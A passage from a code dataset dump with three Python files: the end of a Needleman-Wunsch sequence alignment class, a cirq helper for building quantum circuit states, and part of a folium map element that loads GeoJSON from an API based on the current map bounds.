string1 is used to index columns, string2 is used to index rows\n \"\"\"\n self.string1 = string1\n self.string2 = string2\n self.gap_penalty = gap_penalty\n self.substitution_matrix = matrix\n self.score_matrix = np.zeros((len(string2) + 1, len(string1) + 1), dtype=int)  # np.int was removed from modern NumPy; the builtin int is equivalent\n self.alignments = []\n self.align()\n\n def align(self):\n \"\"\"\n Align given strings using the Needleman-Wunsch algorithm,\n store the alignments and the score matrix used to compute those alignments.\n NB: score matrix and the substitution matrix are different matrices!\n \"\"\"\n self.compute_score_matrix()\n self.compute_alignments()\n\n def compute_score_matrix(self):\n \"\"\"\n Initialize the score matrix.\n Fill the first row and the first column with gap penalties,\n then calculate the top score for each empty cell starting\n from top left.\n \"\"\"\n for column in range(len(self.string1) + 1):\n self.score_matrix[0, column] = self.gap_penalty * column\n for row in range(len(self.string2) + 1):\n self.score_matrix[row, 0] = self.gap_penalty * row\n\n for row in range(1, len(self.string2) + 1):\n for column in range(1, len(self.string1) + 1):\n match = (\n self.score_matrix[row - 1, column - 1]\n + self.substitution_matrix[self.string1[column - 1]][self.string2[row - 1]]\n )\n string1_insertion = (\n self.score_matrix[row - 1, column] + self.gap_penalty\n )\n string2_insertion = (\n self.score_matrix[row, column - 1] + self.gap_penalty\n )\n self.score_matrix[row, column] = max(\n match, string1_insertion, string2_insertion\n )\n\n def compute_alignments(self):\n string1_aligned = []\n string2_aligned = []\n row = len(self.string2)\n column = len(self.string1)\n self.alignments = self.process_cell(row,\n column,\n string1_aligned,\n string2_aligned)\n\n def process_cell(self, row, column, string1_aligned, string2_aligned):\n results = []\n if row == 0 and column == 0:\n string1_aligned.reverse()\n string2_aligned.reverse()\n return [(''.join(string1_aligned), ''.join(string2_aligned))]\n if row > 0 or column > 0:\n if (row > 0 and\n column > 0 and\n self.score_matrix[row, column] == self.score_matrix[row - 1, column - 1]\n + self.substitution_matrix[self.string1[column - 1]][self.string2[row - 1]]):\n results.extend(\n self.process_cell(\n row - 1,\n column - 1,\n string1_aligned + [self.string1[column - 1]],\n string2_aligned + [self.string2[row - 1]]\n )\n )\n if (row > 0 and\n self.score_matrix[row, column] == self.score_matrix[row - 1][column]\n + self.gap_penalty):\n # insertion into string1\n results.extend(\n self.process_cell(\n row - 1,\n column,\n string1_aligned + ['-'],\n string2_aligned + [self.string2[row - 1]]\n )\n )\n if (column > 0 and\n self.score_matrix[row, column] == self.score_matrix[row][column - 1]\n + self.gap_penalty):\n # insertion into string2\n results.extend(\n self.process_cell(\n row,\n column - 1,\n string1_aligned + [self.string1[column - 1]],\n string2_aligned + ['-']\n )\n )\n return results\n\n def get_best_score(self):\n \"\"\"\n :return: the highest score for the aligned strings, int\n\n \"\"\"\n return self.score_matrix[len(self.string2)][len(self.string1)]\n\n def get_number_of_alignments(self):\n \"\"\"\n :return: number of found alignments with the best score, int\n \"\"\"\n return len(self.alignments)\n\n def get_alignments(self):\n \"\"\"\n :return: list of alignments, where each alignment is represented\n as a tuple of aligned strings\n \"\"\"\n return self.alignments\n\n def get_score_matrix(self):\n \"\"\"\n :return: matrix built during the alignment process as 
a list of lists\n \"\"\"\n return self.score_matrix\n\n","sub_path":"codechecker/repos/3/collected_files/global_alignment/ga95suz.py","file_name":"ga95suz.py","file_ext":"py","file_size_in_byte":5347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"351064178","text":"import numpy as np\r\n#import tensorflow as tf\r\n#import tensorflow_quantum as tfq\r\n\r\nimport cirq\r\nimport sympy\r\nfrom cirq.contrib.svg import SVGCircuit\r\n\r\n#State class to initialise qubits and also to prepare the initial Hadamard state for the qubits\r\n\r\nclass states(object):\r\n \r\n def __init__(self, num_qubits, algo_name):\r\n \r\n self.algorithm = algo_name\r\n self.num_qubits = num_qubits\r\n #self.qubit_list = []\r\n self.gate_list = [\"hadamard\"]*num_qubits\r\n\r\n \r\n def get_qubits(self):\r\n\r\n #creates a list of qubits using list format to define cirq qubits\r\n #self.initial_qubit_list = cirq.LineQubit.range(self.num_qubits)\r\n #line_qubit doesn't serialize so use grid_qubit only to merge with tensorflow_quantum\r\n self.initial_qubit_list = cirq.GridQubit.rect(1,self.num_qubits)\r\n\r\n \r\n def get_params(self, num_params):\r\n \r\n #learnable params whose value is to be fed-----\r\n #a = init_name + \"_\" +str(1)\r\n #b = init_name + \"_\" +str(2) \r\n self.named_params = sympy.symbols('param_1, param_2')\r\n curr_iters = num_params-2\r\n for i in range(curr_iters):\r\n self.named_params += (sympy.symbols('param_'+str(i+3)),)\r\n return self.named_params\r\n\r\n\r\n \r\n def get_hadamard_basis_state(self, circuit):\r\n #outputs the Hadamard-layered state, with the initialised circuit given as input\r\n self.get_qubits()\r\n #apply Hadamard gates to the initial qubits\r\n for i in range(self.num_qubits):\r\n circuit.append(cirq.H(self.initial_qubit_list[i]))\r\n \r\n return circuit\r\n \r\n \r\n def apply_hadamard(self, num_qubits, qubits, circuit):\r\n #applies hadamard to a given set of qubits in the given circuit\r\n \r\n for i in range(num_qubits):\r\n circuit.append(cirq.H(qubits[i]))\r\n return circuit\r\n\r\n \r\n def apply_pauli_gate(self, num_qubits, qubits, circuit, gate_index):\r\n #applies pauli gates to a given set of qubits in the given circuit\r\n #gate_index --> 0 means Z, 1 means X, anything else means Y\r\n for i in range(num_qubits):\r\n if gate_index==0:\r\n circuit.append(cirq.Z(qubits[i]))\r\n elif gate_index==1:\r\n circuit.append(cirq.X(qubits[i]))\r\n else:\r\n circuit.append(cirq.Y(qubits[i]))\r\n\r\n return circuit\r\n\r\n def prepare_controlled_gate_state(self, num_qubits, qubits, circuit, gate_index):\r\n #apply controlled pauli gates between every consecutive pair of qubits in the given set\r\n #gate_index --> 0 means CZ, 1 means CX, anything else a controlled-Y\r\n for i in range(num_qubits-1):\r\n if gate_index==0:\r\n circuit.append(cirq.CZ(qubits[i],qubits[i+1]))\r\n elif gate_index==1:\r\n circuit.append(cirq.CX(qubits[i],qubits[i+1]))\r\n else:\r\n #cirq has no top-level CY constant, so build the controlled-Y from Y\r\n circuit.append(cirq.Y(qubits[i+1]).controlled_by(qubits[i]))\r\n\r\n return circuit\r\n \r\n\r\n \r\n def plot_circuit(self, circuit):\r\n #to plot the circuit at any moment\r\n print(\"The circuit is as follows-----> :)\")\r\n SVGCircuit(circuit)\r\n \r\n \r\n\r\n\r\n\r\n \r\n#Checking the states class implementation \r\n\r\nif __name__==\"__main__\":\r\n curr_circuit = cirq.Circuit()\r\n state_class = states(4, \"Grover\")\r\n #state_class.get_qubits()\r\n state_class.get_hadamard_basis_state(curr_circuit)\r\n 
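#added sketch (not part of the original file): a quick way to verify the layer\r\n #worked is to simulate it; the Hadamard layer should give a uniform\r\n #superposition, i.e. 2**4 equal amplitudes. final_state_vector is the\r\n #attribute name on recent cirq releases.\r\n sim_result = cirq.Simulator().simulate(curr_circuit)\r\n print(sim_result.final_state_vector)\r\n 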
#state_class.plot_circuit(curr_circuit)\r\n SVGCircuit(curr_circuit)\r\n \r\n\r\n\r\n","sub_path":"Warm_Start_QAOA/State.py","file_name":"State.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"554664588","text":"import random\n\nfrom jinja2 import Template\nfrom branca.element import Figure, MacroElement, Element\n\n\ndef random_point(min_lng, max_lng, min_lat, max_lat):\n lng = random.uniform(min_lng, max_lng)\n lat = random.uniform(min_lat, max_lat)\n return [lng, lat]\n\n\nclass DynamicGeoJson(MacroElement):\n \"\"\"GeoJson feature to consume live API data based on map bounds.\n\n Each time an event fires that changes the map bounds, the four vertices of the bounds are\n saved in 4 variables: nW, nE, sE, sW. From these 4 vertices, an API request can be made\n for the geographic information that lies inside the current map bounds. The bounds are\n read with Leaflet's .getBounds()\n ***Experimental***\n\n Parameters\n ----------\n action: str, default \"moveend\"\n The map event that triggers the API call. For possible events,\n see https://leafletjs.com/reference-1.4.0.html#map-zoomlevelschange\n url_root: str, default None\n The root of your API without the endpoint variables\n example: \"https://api.somesource/apiv1/\"\n url_pattern: str, default None\n The endpoint pattern used to build the request: written as a Python string,\n but evaluated by JavaScript.\n See the example below\n order: tuple, default (\"lng\", \"lat\")\n Order of the coordinates that represent each point: (\"lng\", \"lat\") or (\"lat\", \"lng\")\n delimiter: str, default \",\"\n How lng and lat of each point are separated\n\n Examples\n --------\n # Create the url root first:\n url_root = \"https://api.somesource/apiv1/\"\n # Four points are always available: nW, nE, sE, sW.\n # If all of them are needed, each joined by a '&', the pattern would be:\n url_pattern = \"nW+'&'+nE+'&'+sE+'&'+sW\"\n\n # Now we just need to create a new GeoJson layer and make it dynamic\n folium.GeoJson(geo_data, dynamic=folium.DynamicGeoJson(\n url_root=url_root,\n url_pattern=url_pattern)).add_to(map)\n\n \"\"\"\n\n _template = Template(\n \"\"\"\n {% macro script(this, kwargs) %}\n\n // JS vars: Revision needed !!\n {% if this.live_update %}\n {{ this._parent.parent_map.get_name() }}.on(\"{{ this.action }}\",\n {% else %}\n $( \"#reload\" ).click({% endif %} function() {\n // Read the current map bounds and derive the four corner coordinates\n // for the API call\n\n d = \"{{ this.delimiter }}\";\n latlng={{ this._parent.parent_map.get_name() }}.getBounds();\n nW = latlng._southWest.{{ this.order[0] }} + d + latlng._northEast.{{ this.order[1] }}\n nE = latlng._northEast.{{ this.order[0] }} + d + latlng._northEast.{{ this.order[1] }}\n sE = latlng._northEast.{{ this.order[0] }} + d + latlng._southWest.{{ this.order[1] }}\n sW = latlng._southWest.{{ this.order[0] }} + d + latlng._southWest.{{ this.order[1] }}\n\n // This will make a new rest api call.\n var opts = {{this.ajax | tojson}};\n opts.url = \"{{ this.url_root }}\" + {{ this.pattern }};\n opts.success = function(data) {\n {{ this._parent.get_name() }}.clearLayers();\n {{ this._parent.get_name() }}.addData(data);\n {% if this._parent._parent.get_name()|truncate(14, True, \"\") == \"marker_cluster\" %}\n {{ this._parent._parent.get_name() }}.clearLayers();\n {{ this._parent.get_name() }}.addTo({{ 
this._parent._parent.get_name() }});\n {% endif %}\n };\n $.ajax(opts);\n });\n\n {% endmacro %}\n \"\"\"\n )\n\n def __init__(\n self,\n action=\"moveend\",\n url_root=None,\n url_pattern=None,\n order=(\"lng\", \"lat\"),\n delimiter=\",\",\n live_update=True,\n button_text=\"Search this area\",\n ajax=None,\n ): # noqa\n super(DynamicGeoJson, self).__init__()\n self._name = \"DynamicGeoJson\"\n self.action = action\n self.url_root = url_root\n self.pattern = url_pattern\n self.order = order\n self.delimiter = delimiter\n self.live_update = live_update\n self.button_text = button_text\n\n self.ajax = {\"url\": \"\", \"dataType\": \"json\", \"async\": True}\n\n if ajax is not None:\n self.ajax.update(ajax)\n\n def render(self, **kwargs): # noqa\n super(DynamicGeoJson, self).render(**kwargs)\n figure = self.get_root()\n assert isinstance(figure, Figure), (\n \"You cannot render this Element \" \"if it is not in a Figure.\"\n )\n\n button_style = \"\"\"\n \n \"\"\"\n button_reload = \"\"\"\n